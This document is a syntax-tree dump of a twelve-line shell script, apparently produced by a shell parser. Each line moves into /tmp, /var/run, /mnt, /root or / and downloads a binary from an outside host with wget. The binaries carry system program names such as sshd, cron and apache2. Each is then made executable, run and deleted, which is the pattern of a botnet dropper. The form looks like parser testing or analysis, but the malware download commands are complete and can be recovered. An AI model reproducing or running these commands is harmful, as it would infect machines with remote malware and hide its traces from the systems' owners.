ListNode(lineno=2, pos=(12, 148), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 112), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 112), word='http://verasquerisasluego.esy.es/Bt/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 127), parts=[
    WordNode(lineno=2, pos=(114, 119), word='chmod'),
    WordNode(lineno=2, pos=(120, 122), word='+x'),
    WordNode(lineno=2, pos=(123, 127), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(127, 128)),
  CommandNode(lineno=2, pos=(129, 135), parts=[
    WordNode(lineno=2, pos=(129, 135), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(135, 136)),
  CommandNode(lineno=2, pos=(137, 148), parts=[
    WordNode(lineno=2, pos=(137, 139), word='rm'),
    WordNode(lineno=2, pos=(140, 143), word='-rf'),
    WordNode(lineno=2, pos=(144, 148), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(149, 285), parts=[
  CommandNode(lineno=3, pos=(149, 156), parts=[
    WordNode(lineno=3, pos=(149, 151), word='cd'),
    WordNode(lineno=3, pos=(152, 156), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 171), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 171), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(172, 174)),
  CommandNode(lineno=3, pos=(175, 182), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 182), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(183, 185)),
  CommandNode(lineno=3, pos=(186, 194), parts=[
    WordNode(lineno=3, pos=(186, 188), word='cd'),
    WordNode(lineno=3, pos=(189, 194), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(195, 197)),
  CommandNode(lineno=3, pos=(198, 202), parts=[
    WordNode(lineno=3, pos=(198, 200), word='cd'),
    WordNode(lineno=3, pos=(201, 202), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(202, 203)),
  CommandNode(lineno=3, pos=(204, 249), parts=[
    WordNode(lineno=3, pos=(204, 208), word='wget'),
    WordNode(lineno=3, pos=(209, 249), word='http://verasquerisasluego.esy.es/Bt/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 264), parts=[
    WordNode(lineno=3, pos=(251, 256), word='chmod'),
    WordNode(lineno=3, pos=(257, 259), word='+x'),
    WordNode(lineno=3, pos=(260, 264), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(264, 265)),
  CommandNode(lineno=3, pos=(266, 272), parts=[
    WordNode(lineno=3, pos=(266, 272), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(272, 273)),
  CommandNode(lineno=3, pos=(274, 285), parts=[
    WordNode(lineno=3, pos=(274, 276), word='rm'),
    WordNode(lineno=3, pos=(277, 280), word='-rf'),
    WordNode(lineno=3, pos=(281, 285), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(286, 434), parts=[
  CommandNode(lineno=4, pos=(286, 293), parts=[
    WordNode(lineno=4, pos=(286, 288), word='cd'),
    WordNode(lineno=4, pos=(289, 293), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 308), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 308), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(309, 311)),
  CommandNode(lineno=4, pos=(312, 319), parts=[
    WordNode(lineno=4, pos=(312, 314), word='cd'),
    WordNode(lineno=4, pos=(315, 319), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(320, 322)),
  CommandNode(lineno=4, pos=(323, 331), parts=[
    WordNode(lineno=4, pos=(323, 325), word='cd'),
    WordNode(lineno=4, pos=(326, 331), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(332, 334)),
  CommandNode(lineno=4, pos=(335, 339), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 339), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(339, 340)),
  CommandNode(lineno=4, pos=(341, 389), parts=[
    WordNode(lineno=4, pos=(341, 345), word='wget'),
    WordNode(lineno=4, pos=(346, 389), word='http://verasquerisasluego.esy.es/Bt/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(389, 390)),
  CommandNode(lineno=4, pos=(391, 407), parts=[
    WordNode(lineno=4, pos=(391, 396), word='chmod'),
    WordNode(lineno=4, pos=(397, 399), word='+x'),
    WordNode(lineno=4, pos=(400, 407), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(407, 408)),
  CommandNode(lineno=4, pos=(409, 418), parts=[
    WordNode(lineno=4, pos=(409, 418), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(418, 419)),
  CommandNode(lineno=4, pos=(420, 434), parts=[
    WordNode(lineno=4, pos=(420, 422), word='rm'),
    WordNode(lineno=4, pos=(423, 426), word='-rf'),
    WordNode(lineno=4, pos=(427, 434), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(435, 571), parts=[
  CommandNode(lineno=5, pos=(435, 442), parts=[
    WordNode(lineno=5, pos=(435, 437), word='cd'),
    WordNode(lineno=5, pos=(438, 442), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(443, 445)),
  CommandNode(lineno=5, pos=(446, 457), parts=[
    WordNode(lineno=5, pos=(446, 448), word='cd'),
    WordNode(lineno=5, pos=(449, 457), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(458, 460)),
  CommandNode(lineno=5, pos=(461, 468), parts=[
    WordNode(lineno=5, pos=(461, 463), word='cd'),
    WordNode(lineno=5, pos=(464, 468), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(469, 471)),
  CommandNode(lineno=5, pos=(472, 480), parts=[
    WordNode(lineno=5, pos=(472, 474), word='cd'),
    WordNode(lineno=5, pos=(475, 480), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(481, 483)),
  CommandNode(lineno=5, pos=(484, 488), parts=[
    WordNode(lineno=5, pos=(484, 486), word='cd'),
    WordNode(lineno=5, pos=(487, 488), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(488, 489)),
  CommandNode(lineno=5, pos=(490, 535), parts=[
    WordNode(lineno=5, pos=(490, 494), word='wget'),
    WordNode(lineno=5, pos=(495, 535), word='http://verasquerisasluego.esy.es/Bt/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(535, 536)),
  CommandNode(lineno=5, pos=(537, 550), parts=[
    WordNode(lineno=5, pos=(537, 542), word='chmod'),
    WordNode(lineno=5, pos=(543, 545), word='+x'),
    WordNode(lineno=5, pos=(546, 550), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(550, 551)),
  CommandNode(lineno=5, pos=(552, 558), parts=[
    WordNode(lineno=5, pos=(552, 558), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(558, 559)),
  CommandNode(lineno=5, pos=(560, 571), parts=[
    WordNode(lineno=5, pos=(560, 562), word='rm'),
    WordNode(lineno=5, pos=(563, 566), word='-rf'),
    WordNode(lineno=5, pos=(567, 571), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(572, 708), parts=[
  CommandNode(lineno=6, pos=(572, 579), parts=[
    WordNode(lineno=6, pos=(572, 574), word='cd'),
    WordNode(lineno=6, pos=(575, 579), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(580, 582)),
  CommandNode(lineno=6, pos=(583, 594), parts=[
    WordNode(lineno=6, pos=(583, 585), word='cd'),
    WordNode(lineno=6, pos=(586, 594), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(595, 597)),
  CommandNode(lineno=6, pos=(598, 605), parts=[
    WordNode(lineno=6, pos=(598, 600), word='cd'),
    WordNode(lineno=6, pos=(601, 605), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(606, 608)),
  CommandNode(lineno=6, pos=(609, 617), parts=[
    WordNode(lineno=6, pos=(609, 611), word='cd'),
    WordNode(lineno=6, pos=(612, 617), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(618, 620)),
  CommandNode(lineno=6, pos=(621, 625), parts=[
    WordNode(lineno=6, pos=(621, 623), word='cd'),
    WordNode(lineno=6, pos=(624, 625), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(625, 626)),
  CommandNode(lineno=6, pos=(627, 672), parts=[
    WordNode(lineno=6, pos=(627, 631), word='wget'),
    WordNode(lineno=6, pos=(632, 672), word='http://verasquerisasluego.esy.es/Bt/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(672, 673)),
  CommandNode(lineno=6, pos=(674, 687), parts=[
    WordNode(lineno=6, pos=(674, 679), word='chmod'),
    WordNode(lineno=6, pos=(680, 682), word='+x'),
    WordNode(lineno=6, pos=(683, 687), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(687, 688)),
  CommandNode(lineno=6, pos=(689, 695), parts=[
    WordNode(lineno=6, pos=(689, 695), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(695, 696)),
  CommandNode(lineno=6, pos=(697, 708), parts=[
    WordNode(lineno=6, pos=(697, 699), word='rm'),
    WordNode(lineno=6, pos=(700, 703), word='-rf'),
    WordNode(lineno=6, pos=(704, 708), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(709, 845), parts=[
  CommandNode(lineno=7, pos=(709, 716), parts=[
    WordNode(lineno=7, pos=(709, 711), word='cd'),
    WordNode(lineno=7, pos=(712, 716), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(717, 719)),
  CommandNode(lineno=7, pos=(720, 731), parts=[
    WordNode(lineno=7, pos=(720, 722), word='cd'),
    WordNode(lineno=7, pos=(723, 731), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(732, 734)),
  CommandNode(lineno=7, pos=(735, 742), parts=[
    WordNode(lineno=7, pos=(735, 737), word='cd'),
    WordNode(lineno=7, pos=(738, 742), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(743, 745)),
  CommandNode(lineno=7, pos=(746, 754), parts=[
    WordNode(lineno=7, pos=(746, 748), word='cd'),
    WordNode(lineno=7, pos=(749, 754), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(755, 757)),
  CommandNode(lineno=7, pos=(758, 762), parts=[
    WordNode(lineno=7, pos=(758, 760), word='cd'),
    WordNode(lineno=7, pos=(761, 762), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(762, 763)),
  CommandNode(lineno=7, pos=(764, 809), parts=[
    WordNode(lineno=7, pos=(764, 768), word='wget'),
    WordNode(lineno=7, pos=(769, 809), word='http://verasquerisasluego.esy.es/Bt/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(809, 810)),
  CommandNode(lineno=7, pos=(811, 824), parts=[
    WordNode(lineno=7, pos=(811, 816), word='chmod'),
    WordNode(lineno=7, pos=(817, 819), word='+x'),
    WordNode(lineno=7, pos=(820, 824), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(824, 825)),
  CommandNode(lineno=7, pos=(826, 832), parts=[
    WordNode(lineno=7, pos=(826, 832), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(832, 833)),
  CommandNode(lineno=7, pos=(834, 845), parts=[
    WordNode(lineno=7, pos=(834, 836), word='rm'),
    WordNode(lineno=7, pos=(837, 840), word='-rf'),
    WordNode(lineno=7, pos=(841, 845), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(846, 982), parts=[
  CommandNode(lineno=8, pos=(846, 853), parts=[
    WordNode(lineno=8, pos=(846, 848), word='cd'),
    WordNode(lineno=8, pos=(849, 853), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(854, 856)),
  CommandNode(lineno=8, pos=(857, 868), parts=[
    WordNode(lineno=8, pos=(857, 859), word='cd'),
    WordNode(lineno=8, pos=(860, 868), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(869, 871)),
  CommandNode(lineno=8, pos=(872, 879), parts=[
    WordNode(lineno=8, pos=(872, 874), word='cd'),
    WordNode(lineno=8, pos=(875, 879), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(880, 882)),
  CommandNode(lineno=8, pos=(883, 891), parts=[
    WordNode(lineno=8, pos=(883, 885), word='cd'),
    WordNode(lineno=8, pos=(886, 891), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(892, 894)),
  CommandNode(lineno=8, pos=(895, 899), parts=[
    WordNode(lineno=8, pos=(895, 897), word='cd'),
    WordNode(lineno=8, pos=(898, 899), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(899, 900)),
  CommandNode(lineno=8, pos=(901, 946), parts=[
    WordNode(lineno=8, pos=(901, 905), word='wget'),
    WordNode(lineno=8, pos=(906, 946), word='http://verasquerisasluego.esy.es/Bt/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(946, 947)),
  CommandNode(lineno=8, pos=(948, 961), parts=[
    WordNode(lineno=8, pos=(948, 953), word='chmod'),
    WordNode(lineno=8, pos=(954, 956), word='+x'),
    WordNode(lineno=8, pos=(957, 961), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(961, 962)),
  CommandNode(lineno=8, pos=(963, 969), parts=[
    WordNode(lineno=8, pos=(963, 969), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(969, 970)),
  CommandNode(lineno=8, pos=(971, 982), parts=[
    WordNode(lineno=8, pos=(971, 973), word='rm'),
    WordNode(lineno=8, pos=(974, 977), word='-rf'),
    WordNode(lineno=8, pos=(978, 982), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(983, 1115), parts=[
  CommandNode(lineno=9, pos=(983, 990), parts=[
    WordNode(lineno=9, pos=(983, 985), word='cd'),
    WordNode(lineno=9, pos=(986, 990), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(991, 993)),
  CommandNode(lineno=9, pos=(994, 1005), parts=[
    WordNode(lineno=9, pos=(994, 996), word='cd'),
    WordNode(lineno=9, pos=(997, 1005), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1006, 1008)),
  CommandNode(lineno=9, pos=(1009, 1016), parts=[
    WordNode(lineno=9, pos=(1009, 1011), word='cd'),
    WordNode(lineno=9, pos=(1012, 1016), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1017, 1019)),
  CommandNode(lineno=9, pos=(1020, 1028), parts=[
    WordNode(lineno=9, pos=(1020, 1022), word='cd'),
    WordNode(lineno=9, pos=(1023, 1028), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1029, 1031)),
  CommandNode(lineno=9, pos=(1032, 1036), parts=[
    WordNode(lineno=9, pos=(1032, 1034), word='cd'),
    WordNode(lineno=9, pos=(1035, 1036), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1036, 1037)),
  CommandNode(lineno=9, pos=(1038, 1082), parts=[
    WordNode(lineno=9, pos=(1038, 1042), word='wget'),
    WordNode(lineno=9, pos=(1043, 1082), word='http://verasquerisasluego.esy.es/Bt/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1082, 1083)),
  CommandNode(lineno=9, pos=(1084, 1096), parts=[
    WordNode(lineno=9, pos=(1084, 1089), word='chmod'),
    WordNode(lineno=9, pos=(1090, 1092), word='+x'),
    WordNode(lineno=9, pos=(1093, 1096), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1096, 1097)),
  CommandNode(lineno=9, pos=(1098, 1103), parts=[
    WordNode(lineno=9, pos=(1098, 1103), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1103, 1104)),
  CommandNode(lineno=9, pos=(1105, 1115), parts=[
    WordNode(lineno=9, pos=(1105, 1107), word='rm'),
    WordNode(lineno=9, pos=(1108, 1111), word='-rf'),
    WordNode(lineno=9, pos=(1112, 1115), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1116, 1252), parts=[
  CommandNode(lineno=10, pos=(1116, 1123), parts=[
    WordNode(lineno=10, pos=(1116, 1118), word='cd'),
    WordNode(lineno=10, pos=(1119, 1123), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1124, 1126)),
  CommandNode(lineno=10, pos=(1127, 1138), parts=[
    WordNode(lineno=10, pos=(1127, 1129), word='cd'),
    WordNode(lineno=10, pos=(1130, 1138), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1139, 1141)),
  CommandNode(lineno=10, pos=(1142, 1149), parts=[
    WordNode(lineno=10, pos=(1142, 1144), word='cd'),
    WordNode(lineno=10, pos=(1145, 1149), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1150, 1152)),
  CommandNode(lineno=10, pos=(1153, 1161), parts=[
    WordNode(lineno=10, pos=(1153, 1155), word='cd'),
    WordNode(lineno=10, pos=(1156, 1161), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1162, 1164)),
  CommandNode(lineno=10, pos=(1165, 1169), parts=[
    WordNode(lineno=10, pos=(1165, 1167), word='cd'),
    WordNode(lineno=10, pos=(1168, 1169), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1169, 1170)),
  CommandNode(lineno=10, pos=(1171, 1216), parts=[
    WordNode(lineno=10, pos=(1171, 1175), word='wget'),
    WordNode(lineno=10, pos=(1176, 1216), word='http://verasquerisasluego.esy.es/Bt/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1216, 1217)),
  CommandNode(lineno=10, pos=(1218, 1231), parts=[
    WordNode(lineno=10, pos=(1218, 1223), word='chmod'),
    WordNode(lineno=10, pos=(1224, 1226), word='+x'),
    WordNode(lineno=10, pos=(1227, 1231), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1231, 1232)),
  CommandNode(lineno=10, pos=(1233, 1239), parts=[
    WordNode(lineno=10, pos=(1233, 1239), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1239, 1240)),
  CommandNode(lineno=10, pos=(1241, 1252), parts=[
    WordNode(lineno=10, pos=(1241, 1243), word='rm'),
    WordNode(lineno=10, pos=(1244, 1247), word='-rf'),
    WordNode(lineno=10, pos=(1248, 1252), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1253, 1381), parts=[
  CommandNode(lineno=11, pos=(1253, 1260), parts=[
    WordNode(lineno=11, pos=(1253, 1255), word='cd'),
    WordNode(lineno=11, pos=(1256, 1260), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1261, 1263)),
  CommandNode(lineno=11, pos=(1264, 1275), parts=[
    WordNode(lineno=11, pos=(1264, 1266), word='cd'),
    WordNode(lineno=11, pos=(1267, 1275), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1276, 1278)),
  CommandNode(lineno=11, pos=(1279, 1286), parts=[
    WordNode(lineno=11, pos=(1279, 1281), word='cd'),
    WordNode(lineno=11, pos=(1282, 1286), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1287, 1289)),
  CommandNode(lineno=11, pos=(1290, 1298), parts=[
    WordNode(lineno=11, pos=(1290, 1292), word='cd'),
    WordNode(lineno=11, pos=(1293, 1298), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1299, 1301)),
  CommandNode(lineno=11, pos=(1302, 1306), parts=[
    WordNode(lineno=11, pos=(1302, 1304), word='cd'),
    WordNode(lineno=11, pos=(1305, 1306), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1306, 1307)),
  CommandNode(lineno=11, pos=(1308, 1351), parts=[
    WordNode(lineno=11, pos=(1308, 1312), word='wget'),
    WordNode(lineno=11, pos=(1313, 1351), word='http://verasquerisasluego.esy.es/Bt/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1351, 1352)),
  CommandNode(lineno=11, pos=(1353, 1364), parts=[
    WordNode(lineno=11, pos=(1353, 1358), word='chmod'),
    WordNode(lineno=11, pos=(1359, 1361), word='+x'),
    WordNode(lineno=11, pos=(1362, 1364), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1364, 1365)),
  CommandNode(lineno=11, pos=(1366, 1370), parts=[
    WordNode(lineno=11, pos=(1366, 1370), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1370, 1371)),
  CommandNode(lineno=11, pos=(1372, 1381), parts=[
    WordNode(lineno=11, pos=(1372, 1374), word='rm'),
    WordNode(lineno=11, pos=(1375, 1378), word='-rf'),
    WordNode(lineno=11, pos=(1379, 1381), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1382, 1530), parts=[
  CommandNode(lineno=12, pos=(1382, 1389), parts=[
    WordNode(lineno=12, pos=(1382, 1384), word='cd'),
    WordNode(lineno=12, pos=(1385, 1389), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1390, 1392)),
  CommandNode(lineno=12, pos=(1393, 1404), parts=[
    WordNode(lineno=12, pos=(1393, 1395), word='cd'),
    WordNode(lineno=12, pos=(1396, 1404), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1405, 1407)),
  CommandNode(lineno=12, pos=(1408, 1415), parts=[
    WordNode(lineno=12, pos=(1408, 1410), word='cd'),
    WordNode(lineno=12, pos=(1411, 1415), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1416, 1418)),
  CommandNode(lineno=12, pos=(1419, 1427), parts=[
    WordNode(lineno=12, pos=(1419, 1421), word='cd'),
    WordNode(lineno=12, pos=(1422, 1427), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1428, 1430)),
  CommandNode(lineno=12, pos=(1431, 1435), parts=[
    WordNode(lineno=12, pos=(1431, 1433), word='cd'),
    WordNode(lineno=12, pos=(1434, 1435), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1435, 1436)),
  CommandNode(lineno=12, pos=(1437, 1485), parts=[
    WordNode(lineno=12, pos=(1437, 1441), word='wget'),
    WordNode(lineno=12, pos=(1442, 1485), word='http://verasquerisasluego.esy.es/Bt/apache2'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1485, 1486)),
  CommandNode(lineno=12, pos=(1487, 1503), parts=[
    WordNode(lineno=12, pos=(1487, 1492), word='chmod'),
    WordNode(lineno=12, pos=(1493, 1495), word='+x'),
    WordNode(lineno=12, pos=(1496, 1503), word='apache2'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1503, 1504)),
  CommandNode(lineno=12, pos=(1505, 1514), parts=[
    WordNode(lineno=12, pos=(1505, 1514), word='./apache2'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1514, 1515)),
  CommandNode(lineno=12, pos=(1516, 1530), parts=[
    WordNode(lineno=12, pos=(1516, 1518), word='rm'),
    WordNode(lineno=12, pos=(1519, 1522), word='-rf'),
    WordNode(lineno=12, pos=(1523, 1530), word='apache2'),
  ]),
])
ListNode(lineno=13, pos=(1531, 1679), parts=[
  CommandNode(lineno=13, pos=(1531, 1538), parts=[
    WordNode(lineno=13, pos=(1531, 1533), word='cd'),
    WordNode(lineno=13, pos=(1534, 1538), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1539, 1541)),
  CommandNode(lineno=13, pos=(1542, 1553), parts=[
    WordNode(lineno=13, pos=(1542, 1544), word='cd'),
    WordNode(lineno=13, pos=(1545, 1553), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1554, 1556)),
  CommandNode(lineno=13, pos=(1557, 1564), parts=[
    WordNode(lineno=13, pos=(1557, 1559), word='cd'),
    WordNode(lineno=13, pos=(1560, 1564), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1565, 1567)),
  CommandNode(lineno=13, pos=(1568, 1576), parts=[
    WordNode(lineno=13, pos=(1568, 1570), word='cd'),
    WordNode(lineno=13, pos=(1571, 1576), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1577, 1579)),
  CommandNode(lineno=13, pos=(1580, 1584), parts=[
    WordNode(lineno=13, pos=(1580, 1582), word='cd'),
    WordNode(lineno=13, pos=(1583, 1584), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1584, 1585)),
  CommandNode(lineno=13, pos=(1586, 1634), parts=[
    WordNode(lineno=13, pos=(1586, 1590), word='wget'),
    WordNode(lineno=13, pos=(1591, 1634), word='http://verasquerisasluego.esy.es/Bt/telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1634, 1635)),
  CommandNode(lineno=13, pos=(1636, 1652), parts=[
    WordNode(lineno=13, pos=(1636, 1641), word='chmod'),
    WordNode(lineno=13, pos=(1642, 1644), word='+x'),
    WordNode(lineno=13, pos=(1645, 1652), word='telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1652, 1653)),
  CommandNode(lineno=13, pos=(1654, 1663), parts=[
    WordNode(lineno=13, pos=(1654, 1663), word='./telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1663, 1664)),
  CommandNode(lineno=13, pos=(1665, 1679), parts=[
    WordNode(lineno=13, pos=(1665, 1667), word='rm'),
    WordNode(lineno=13, pos=(1668, 1671), word='-rf'),
    WordNode(lineno=13, pos=(1672, 1679), word='telnetd'),
  ]),
])
